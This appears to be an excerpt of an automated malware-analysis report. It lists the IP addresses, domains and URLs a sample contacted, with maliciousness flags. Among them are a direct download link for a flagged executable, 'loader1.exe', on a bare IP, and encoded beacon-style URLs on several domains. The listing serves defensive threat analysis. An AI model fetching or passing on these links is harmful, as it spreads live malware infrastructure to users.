40034 CONFLUENCE-NETWORK-INCVG true
169.62.91.142
 www.doityourselfism.com United States
36351 SOFTLAYERUS true
50.87.248.20
 matcitekids.com United States
46606 UNIFIEDLAYER-AS-1US true
107.173.219.122
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted Domains

Name IP Active
matcitekids.com 50.87.248.20 true
www.onedadtwodudes.com 209.99.64.51 true
www.doityourselfism.com 169.62.91.142 true
www.ecofingers.com 52.58.78.16 true
www.matcitekids.com unknown unknown
www.garimpeirastore.online unknown unknown
www.builtbydawn.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.ecofingers.com/dy8g/?illD=X9Az7RtkaU81d6o9S6tJRjQeFUHqBPh6fbjII6Bm04v0rRN3gQJahLAd3CrM9JEnxgRa3A==&7nh=0br0WzXxgHiLa true
  • Avira URL Cloud: safe
 unknown
http://107.173.219.122/files/loader1.exe true
  • Avira URL Cloud: malware
 unknown
http://www.matcitekids.com/dy8g/?illD=dI9eO6GBnSulhV6EbBGZI9CJMc/scmM0Fshd6X+e3vq0VlxBF2NWOUbA55lfRDBFVPtqQQ==&7nh=0br0WzXxgHiLa true
  • Avira URL Cloud: safe
 unknown
www.extinctionbrews.com/dy8g/ true
  • Avira URL Cloud: safe
 low
http://www.doityourselfism.com/dy8g/?illD=Y4JBfBjEKLG3bE/nPu+ARLK4ZQab+dap1kyoobOuuyzzJOKZWwpYr6zx24KPHwTC7q0HDg==&7nh=0br0WzXxgHiLa true
  • Avira URL Cloud: safe
 unknown